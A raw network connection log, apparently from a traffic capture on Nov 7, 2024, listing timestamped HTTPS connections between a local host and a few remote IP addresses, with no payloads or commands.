                                                                Nov 7, 2024 21:41:51.557055950 CET49805443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:51.557324886 CET49806443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:51.557348013 CET44349806188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:51.557427883 CET49806443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:51.557626009 CET49806443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:51.557637930 CET44349806188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:52.464704990 CET44349806188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:52.465002060 CET49806443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:52.465018034 CET44349806188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:52.465359926 CET44349806188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:52.465666056 CET49806443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:52.465728998 CET44349806188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:52.465801954 CET49806443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:52.507338047 CET44349806188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:52.615912914 CET44349806188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:52.615997076 CET44349806188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:52.616055012 CET49806443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:52.616573095 CET49806443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:52.616585016 CET44349806188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:52.619239092 CET49807443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:52.619267941 CET44349807188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:52.619374990 CET49807443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:52.619774103 CET49808443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:52.619837046 CET44349808188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:52.619894981 CET49808443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:52.620215893 CET49807443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:52.620229006 CET44349807188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:52.620434999 CET49808443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:52.620451927 CET44349808188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:52.620708942 CET49809443192.168.2.16188.114.96.3
                                                                Nov 7, 2024 21:41:52.620733976 CET44349809188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:41:52.620785952 CET49809443192.168.2.16188.114.96.3
                                                                Nov 7, 2024 21:41:52.621108055 CET49810443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:52.621118069 CET44349810188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:52.621167898 CET49810443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:52.621309042 CET49809443192.168.2.16188.114.96.3
                                                                Nov 7, 2024 21:41:52.621321917 CET44349809188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:41:52.621525049 CET49810443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:52.621539116 CET44349810188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:52.996042013 CET49811443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:52.996066093 CET44349811188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:52.996155977 CET49811443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:52.996505022 CET49811443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:52.996515036 CET44349811188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.229885101 CET44349810188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.230174065 CET49810443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.230202913 CET44349810188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.231245041 CET44349810188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.231337070 CET49810443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.231630087 CET49810443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.231630087 CET49810443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.231674910 CET49810443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.231695890 CET44349810188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.231749058 CET49810443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.231996059 CET49812443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.232021093 CET44349812188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.232095003 CET49812443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.232295990 CET49812443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.232306957 CET44349812188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.233413935 CET44349809188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.233597040 CET49809443192.168.2.16188.114.96.3
                                                                Nov 7, 2024 21:41:53.233614922 CET44349809188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.233918905 CET44349809188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.234191895 CET49809443192.168.2.16188.114.96.3
                                                                Nov 7, 2024 21:41:53.234242916 CET44349809188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.234313965 CET49809443192.168.2.16188.114.96.3
                                                                Nov 7, 2024 21:41:53.260155916 CET44349808188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.260394096 CET49808443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.260404110 CET44349808188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.261360884 CET44349808188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.261435032 CET49808443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.261682987 CET49808443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.261693001 CET49808443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.261734962 CET49808443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.261740923 CET44349808188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.261792898 CET49808443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.270375013 CET44349807188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.270581961 CET49807443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.270591974 CET44349807188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.271580935 CET44349807188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.271641970 CET49807443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.271929979 CET49807443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.271943092 CET49807443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.271979094 CET49807443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.272027016 CET44349807188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.272079945 CET49807443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.272253036 CET49813443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.272275925 CET44349813188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.272347927 CET49813443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.272399902 CET49814443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.272408009 CET44349814188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.272468090 CET49814443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.272561073 CET49813443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.272572041 CET44349813188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.272696972 CET49814443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.272705078 CET44349814188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.275330067 CET44349809188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.388901949 CET44349809188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.388957024 CET44349809188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.389010906 CET49809443192.168.2.16188.114.96.3
                                                                Nov 7, 2024 21:41:53.389885902 CET49809443192.168.2.16188.114.96.3
                                                                Nov 7, 2024 21:41:53.389897108 CET44349809188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.605854988 CET44349811188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.606200933 CET49811443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.606215000 CET44349811188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.607069969 CET44349811188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.607139111 CET49811443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.607422113 CET49811443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.607433081 CET49811443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.607472897 CET44349811188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.607481003 CET49811443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.607530117 CET49811443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.607795000 CET49815443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.607817888 CET44349815188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.607894897 CET49815443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.608084917 CET49815443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.608097076 CET44349815188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.852294922 CET44349812188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.852626085 CET49812443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.852641106 CET44349812188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.853501081 CET44349812188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.853578091 CET49812443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.853879929 CET49812443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.853936911 CET44349812188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.854049921 CET49812443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.854055882 CET44349812188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.907367945 CET49812443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.917049885 CET44349814188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.917335033 CET49814443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.917344093 CET44349814188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.918354034 CET44349814188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.918416023 CET49814443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.918698072 CET49814443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.918765068 CET44349814188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.919219017 CET49814443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.919225931 CET44349814188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.921561956 CET49816443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.921602964 CET44349816188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.921674967 CET49816443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.921931028 CET49816443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.921945095 CET44349816188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.923254013 CET44349813188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.923468113 CET49813443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.923485041 CET44349813188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.924501896 CET44349813188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.924573898 CET49813443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.924868107 CET49813443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.924954891 CET44349813188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.924998999 CET49813443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.967338085 CET44349813188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:53.971340895 CET49814443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.971374035 CET49813443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:53.971384048 CET44349813188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:54.018373966 CET49813443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:54.114542961 CET44349814188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:54.114645004 CET44349814188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:54.114701033 CET49814443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:54.114727974 CET49814443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:54.114738941 CET44349814188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:54.114751101 CET49814443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:54.114787102 CET49814443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:54.124928951 CET44349813188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:54.125017881 CET44349813188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:54.125077963 CET49813443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:54.125521898 CET49813443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:54.125531912 CET44349813188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:54.125896931 CET49817443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:54.125926018 CET44349817188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:54.125997066 CET49817443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:54.126625061 CET49817443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:54.126637936 CET44349817188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:54.228996038 CET44349815188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:54.229293108 CET49815443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:54.229300976 CET44349815188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:54.230509996 CET44349815188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:54.230592012 CET49815443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:54.230957031 CET49815443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:54.231014967 CET44349815188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:54.231148958 CET49815443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:54.231153965 CET44349815188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:54.274348974 CET49815443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:54.562443972 CET44349816188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:54.564157963 CET49816443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:54.564182997 CET44349816188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:54.565099955 CET44349816188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:54.565197945 CET49816443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:54.565578938 CET49816443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:54.565596104 CET49816443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:54.565635920 CET44349816188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:54.565650940 CET49816443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:54.565687895 CET49816443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:54.566128016 CET49818443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:54.566162109 CET44349818188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:54.566239119 CET49818443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:54.566432953 CET49818443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:54.566446066 CET44349818188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:54.765496969 CET44349817188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:54.765764952 CET49817443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:54.765784979 CET44349817188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:54.766840935 CET44349817188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:54.766912937 CET49817443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:54.767260075 CET49817443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:54.767271996 CET49817443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:54.767330885 CET44349817188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:54.767340899 CET49817443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:54.767400980 CET49817443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:54.767616034 CET49819443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:54.767638922 CET44349819188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:54.767714024 CET49819443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:54.767919064 CET49819443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:54.767930031 CET44349819188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:55.201055050 CET44349818188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:55.201387882 CET49818443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:55.201401949 CET44349818188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:55.201729059 CET44349818188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:55.202024937 CET49818443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:55.202083111 CET44349818188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:55.202222109 CET49818443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:55.243333101 CET44349818188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:55.385376930 CET44349819188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:55.385730982 CET49819443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:55.385745049 CET44349819188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:55.386107922 CET44349819188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:55.386413097 CET49819443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:55.386478901 CET44349819188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:55.386593103 CET49819443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:55.393589020 CET44349818188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:55.393663883 CET44349818188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:55.393721104 CET49818443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:55.394156933 CET49818443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:55.394175053 CET44349818188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:55.394650936 CET49820443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:55.394687891 CET44349820188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:55.394886971 CET49820443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:55.395574093 CET49820443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:55.395590067 CET44349820188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:55.427335024 CET44349819188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:56.009588957 CET44349820188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:56.009906054 CET49820443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:56.009928942 CET44349820188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:56.011008978 CET44349820188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:56.011080980 CET49820443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:56.011367083 CET49820443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:56.011384010 CET49820443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:56.011428118 CET49820443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:56.011434078 CET44349820188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:56.011488914 CET49820443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:56.011744022 CET49821443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:56.011776924 CET44349821188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:56.011852980 CET49821443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:56.012048960 CET49821443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:56.012063026 CET44349821188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:56.975466013 CET44349821188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:56.975785017 CET49821443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:56.975848913 CET44349821188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:56.976212978 CET44349821188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:56.976548910 CET49821443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:56.976613045 CET44349821188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:56.976701021 CET49821443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:57.023333073 CET44349821188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:42:00.094217062 CET44349782188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:42:00.094281912 CET44349782188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:42:00.094351053 CET49782443192.168.2.16188.114.96.3
                                                                Nov 7, 2024 21:42:00.095208883 CET49782443192.168.2.16188.114.96.3
                                                                Nov 7, 2024 21:42:00.095221043 CET44349782188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:42:01.582175016 CET49822443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:01.582201958 CET4434982235.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:42:01.582250118 CET49822443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:01.582601070 CET49822443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:01.582612991 CET4434982235.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:42:01.589132071 CET49823443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:01.589159012 CET4434982335.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:42:01.589230061 CET49823443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:01.589389086 CET49823443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:01.589401960 CET4434982335.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:42:02.190650940 CET4434982235.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:42:02.191050053 CET49822443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:02.191062927 CET4434982235.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:42:02.191943884 CET4434982235.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:42:02.192039013 CET49822443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:02.192326069 CET49822443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:02.192375898 CET4434982235.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:42:02.192461967 CET49822443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:02.192467928 CET4434982235.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:42:02.197165012 CET4434982335.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:42:02.197359085 CET49823443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:02.197376966 CET4434982335.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:42:02.198252916 CET4434982335.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:42:02.198314905 CET49823443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:02.198558092 CET49823443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:02.198606968 CET4434982335.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:42:02.198638916 CET49823443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:02.234369993 CET49822443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:02.239335060 CET4434982335.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:42:02.250356913 CET49823443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:02.250379086 CET4434982335.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:42:02.298361063 CET49823443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:02.336745024 CET4434982235.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:42:02.337191105 CET49822443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:02.337223053 CET4434982235.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:42:02.337296009 CET49822443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:02.337743044 CET49824443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:02.337770939 CET4434982435.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:42:02.337852001 CET49824443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:02.338139057 CET49824443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:02.338151932 CET4434982435.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:42:02.349271059 CET4434982335.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:42:02.349548101 CET49823443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:02.349591970 CET4434982335.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:42:02.349648952 CET49823443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:02.349996090 CET49825443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:02.350038052 CET4434982535.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:42:02.350107908 CET49825443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:02.350317955 CET49825443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:02.350334883 CET4434982535.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:42:02.827770948 CET49826443192.168.2.16142.250.186.100
                                                                Nov 7, 2024 21:42:02.827796936 CET44349826142.250.186.100192.168.2.16
                                                                Nov 7, 2024 21:42:02.827915907 CET49826443192.168.2.16142.250.186.100
                                                                Nov 7, 2024 21:42:02.828151941 CET49826443192.168.2.16142.250.186.100
                                                                Nov 7, 2024 21:42:02.828169107 CET44349826142.250.186.100192.168.2.16
                                                                Nov 7, 2024 21:42:02.945694923 CET4434982435.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:42:02.945997953 CET49824443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:02.946019888 CET4434982435.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:42:02.946881056 CET4434982435.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:42:02.946952105 CET49824443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:02.947298050 CET49824443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:02.947355032 CET4434982435.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:42:02.947369099 CET49824443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:02.967386961 CET4434982535.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:42:02.967678070 CET49825443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:02.967696905 CET4434982535.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:42:02.968569994 CET4434982535.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:42:02.968652964 CET49825443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:02.968921900 CET49825443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:02.968976974 CET4434982535.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:42:02.969053030 CET49825443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:02.969062090 CET4434982535.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:42:02.969414949 CET49825443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:02.991331100 CET4434982435.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:42:03.002306938 CET49824443192.168.2.1635.190.80.1
